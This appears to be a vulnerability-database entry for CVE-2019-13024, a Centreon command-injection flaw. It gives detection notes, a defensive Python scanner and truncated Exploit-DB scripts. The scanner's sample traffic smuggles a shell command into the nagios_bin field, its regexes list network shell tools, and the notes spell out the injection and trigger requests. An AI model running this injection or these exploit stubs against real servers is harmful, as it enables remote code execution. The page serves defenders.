CVE-2019-13024
Published: 2019-07-01
Priority: P274 · Severity: high · CVSS 3.0 base score: 8.8 · Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: EXPLOIT
EPSS: 32.16% (percentile 98.1)
Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allow an attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert an arbitrary command into the database, and then executing it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the value read back from the database to shell_exec without sanitizing it, allowing arbitrary system commands to be executed).
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| centreon | centreon | — | — |
Detection & IOCs
- Monitor POST requests to /include/configuration/configGenerate/xml/generateFiles.php with parameters poller, debug, and generate: this is the trigger endpoint that causes shell_exec of the injected command.
- Detect POST requests to /main.get.php?p=60901 (Poller configuration page) where the nagios_bin field contains shell metacharacters or unexpected binaries (e.g., ncat, bash, nc): this is the injection point for the malicious command.
- Alert on the init_script / Monitoring Engine Binary field (nagios_bin) in Centreon poller configuration containing shell operators or network tools: the value is stored in the database and later executed via shell_exec.
- Detect high-frequency POST requests to /centreon/api/index.php?action=authenticate from a single source IP: this endpoint is targeted by the brute-force stage that precedes RCE exploitation.
- Look for the POST body parameter combination poller=1&debug=true&generate=true sent to /generateFiles.php as a reliable indicator of an exploitation attempt.
- Exploitation requires prior authentication to Centreon; attackers must obtain valid credentials (e.g., via brute force against the API) before injecting the payload.
- The injected nagios_bin payload uses a trailing '#' comment character to suppress the remainder of the legitimate command string; detection rules should account for this obfuscation pattern.
- Affected versions span Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29; detections should be scoped to these versions.
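The detection notes above can be turned into a small rule set. The following Python is an added example, not code from the page or from Centreon; it assumes requests have already been decoded into dictionaries with `ip`, `method`, `url` and `body` (request bodies are only available when a reverse proxy, WAF or application log records them, which plain access logs do not), and the sample traffic, the IP addresses and the `nagios_bin` values are constructed for the demonstration. The rules generalize the notes slightly: any shell operator in `nagios_bin` is flagged, not only the tool names listed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the CVE description and the detection notes above.
TRIGGER_PATH = "/include/configuration/configGenerate/xml/generateFiles.php"
POLLER_PATH = "/main.get.php"
AUTH_PATH = "/api/index.php"

# Shell operators that never belong in a path to a monitoring engine binary,
# plus the tool names the notes single out (the tool list is an assumption).
SHELL_META = re.compile(r"[;&|`$()<>#\n]")
SUSPECT_TOOLS = re.compile(r"\b(nc|ncat|netcat|bash|perl|curl|wget)\b")


def form_fields(body):
    """Decode an application/x-www-form-urlencoded body to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def check_request(req):
    """Return the names of the rules a single request matches (empty if clean)."""
    hits = []
    parts = urlsplit(req["url"])
    query = parse_qs(parts.query)
    form = form_fields(req.get("body", "")) if req["method"] == "POST" else {}

    # Rule 1: the call that makes generateFiles.php pass the stored value to shell_exec.
    if req["method"] == "POST" and parts.path.endswith(TRIGGER_PATH):
        if "poller" in form and form.get("debug") == "true" and form.get("generate") == "true":
            hits.append("generateFiles trigger (poller/debug/generate)")

    # Rule 2: the injection point, the nagios_bin field of the poller configuration page.
    if req["method"] == "POST" and parts.path.endswith(POLLER_PATH) and query.get("p") == ["60901"]:
        nagios_bin = form.get("nagios_bin", "")
        if SHELL_META.search(nagios_bin) or SUSPECT_TOOLS.search(nagios_bin):
            hits.append("nagios_bin contains shell operator or network tool: %r" % nagios_bin)
    return hits


def bruteforce_sources(requests, threshold=20):
    """Source IPs that POSTed to the authenticate endpoint more than `threshold` times."""
    counts = Counter(
        r["ip"] for r in requests
        if r["method"] == "POST"
        and urlsplit(r["url"]).path.endswith(AUTH_PATH)
        and parse_qs(urlsplit(r["url"]).query).get("action") == ["authenticate"]
    )
    return sorted(ip for ip, n in counts.items() if n > threshold)


def scan(requests):
    """Return [(index, hits)] for every request that matched at least one rule."""
    flagged = []
    for i, r in enumerate(requests):
        hits = check_request(r)
        if hits:
            flagged.append((i, hits))
    return flagged


def sample_requests():
    """Constructed sample traffic (not taken from the page): one normal admin
    session, then one session that follows the sequence the notes describe."""
    reqs = [
        {"ip": "198.51.100.5", "method": "GET", "url": "/centreon/main.php?p=60901", "body": ""},
        # A legitimate poller edit keeps nagios_bin as a plain path.
        {"ip": "198.51.100.5", "method": "POST", "url": "/centreon/main.get.php?p=60901",
         "body": "nagios_bin=%2Fusr%2Fsbin%2Fcentengine&name=Central"},
    ]
    # Credential guessing against the API: 25 attempts from one address.
    reqs += [{"ip": "203.0.113.7", "method": "POST",
              "url": "/centreon/api/index.php?action=authenticate",
              "body": "username=admin&password=guess%d" % n} for n in range(25)]
    # Poller edit storing shell syntax (with the trailing '#') in nagios_bin, then the trigger.
    reqs += [
        {"ip": "203.0.113.7", "method": "POST", "url": "/centreon/main.get.php?p=60901",
         "body": "nagios_bin=%2Fusr%2Fsbin%2Fcentengine%3Bid+%23&name=Central"},
        {"ip": "203.0.113.7", "method": "POST",
         "url": "/centreon/include/configuration/configGenerate/xml/generateFiles.php",
         "body": "poller=1&debug=true&generate=true"},
    ]
    return reqs


if __name__ == "__main__":
    reqs = sample_requests()
    for i, hits in scan(reqs):
        print(i, reqs[i]["ip"], hits)
    print("possible credential brute force from:", bruteforce_sources(reqs))
```

Run stand-alone, the script flags only the two requests from the second session (the poller edit and the generate call) and reports the address that hammered the authenticate endpoint; the benign poller edit with a plain path is not flagged. Correlating rule 2 and rule 1 from the same source within a short window is the strongest signal, since the page states the value is stored first and executed later.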
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
No detection rules found.
Exploit-DB: Centron 19.04 - Remote Code Execution (RCE)
exploitdb · 2025-04-10 · CVE-2019-13024
```python
#!/usr/bin/env python3
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
import sys
import requests
import argparse
from termcolor import colored
import os

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
    parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
    parser.add_argument('--https', de
```
Exploit-DB: Centreon 19.04 - Remote Code Execution
exploitdb · 2019-07-02 · CVSS 8.8 · CVE-2019-13024 [HIGH]
```python
#!/usr/bin/python
'''
# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
# Date: 28/06/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-13024
# Vendor Homepage: https://www.centreon.com/
# Software link: https://download.centreon.com
# Version: v19.04
# Tested on: CentOS 7.6 / PHP 5.4.16
'''
import requests
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./centreon-exploit.py url username password ip port")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.se
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/153504/Centreon-19.04-Remote-Code-Execution.html
- https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-18.10/centreon-18.10.6.html
- https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.04/centreon-19.04.3.html
- https://gist.github.com/mhaskar/c4255f6cf45b19b8a852c780f50576da
- https://github.com/centreon/centreon/pull/7694
- https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/